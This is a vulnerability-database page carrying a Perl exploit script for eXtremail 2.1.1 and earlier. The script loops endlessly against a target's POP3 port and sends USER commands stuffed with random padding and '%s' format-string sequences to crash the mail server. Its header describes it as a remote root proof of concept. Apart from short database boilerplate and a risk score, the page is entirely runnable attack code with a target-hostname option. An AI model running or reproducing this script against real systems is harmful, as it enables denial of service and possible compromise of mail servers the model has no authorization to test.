Lucene search

K

eXtremail <= 2.1.1 memmove() Remote Denial of Service Exploit

🗓️ 15 Oct 2007 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

eXtremail <= 2.1.1 memmove() Remote DoS Exploi

Show more
Code

                                                #!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by &lt;[email protected]&gt;
#
# eXtremail &lt;=2.1.1 remote root POC (x86-lnx)
# by mu-b - Fri Oct 06 2006
#
# Tested on: eXtremail 2.1.1 (lnx)
#            eXtremail 2.1.0 (lnx)
#
#    - Private Source Code -DO NOT DISTRIBUTE -
# http://www.digit-labs.org/ -- Digit-Labs 2006!@$!
########

use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;

&amp;print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &amp;usage; }

my $pop3_port = 110;
my $send_delay = 1;

my $NOP = 'A';

srand(time());
while (1) {
    if (connect_host($target, $pop3_port)) {
        # [0,50) -&gt; [1,50]
        $max_len  = int(rand(50) + 1);

        # [0, $max_len * 0.75) -&gt; [0, ($max_len * 0x75) - 1]
        $pad1_len = int(rand($max_len * 0.75));

        # [0, ($max_len - $pad1_len)/2) -&gt; [1, ($max_len - $pad1_len)/2]
        $pad2_len = int(rand(($max_len - $pad1_len)/length(&quot;%s&quot;)) + 1);

        $pad3_len = $max_len - $pad1_len - ($pad2_len * length(&quot;%s&quot;));

        $buf = &quot;USER &quot;.
               ($NOP x $pad1_len).
               (&quot;%s&quot; x $pad2_len).
               ($NOP x $pad3_len).
               &quot;\n&quot;;
        print(&quot;-&gt; * Sending: $max_len $pad1_len $pad2_len $pad3_len &quot;.$buf);
        send(SOCKET, $buf, 0);
        sleep($send_delay);

        close(SOCKET);
    }
}

sub print_header {
    print(&quot;eXtremail &lt;=2.1.1 remote root POC (x86-lnx)\n&quot;);
    print(&quot;by: &lt;mu-b\@digit-labs.org&gt;\n&quot;);
    print(&quot;http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n&quot;);
}

sub usage {
  print(qq(Usage: $0 -t &lt;hostname&gt;

     -t &lt;hostname&gt;    : hostname to test
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target)                 || die(&quot;Error: $!\n&quot;);
    $paddr  = sockaddr_in($port, $iaddr)         || die(&quot;Error: $!\n&quot;);
    $proto  = getprotobyname('tcp')              || die(&quot;Error: $!\n&quot;);

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(&quot;Error: $!\n&quot;);
    connect(SOCKET, $paddr)                      || die(&quot;Error: $!\n&quot;);
    return(1338);
}
                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 Oct 2007 00:00Current
7.1High risk
Vulners AI Score7.1
10
.json
Report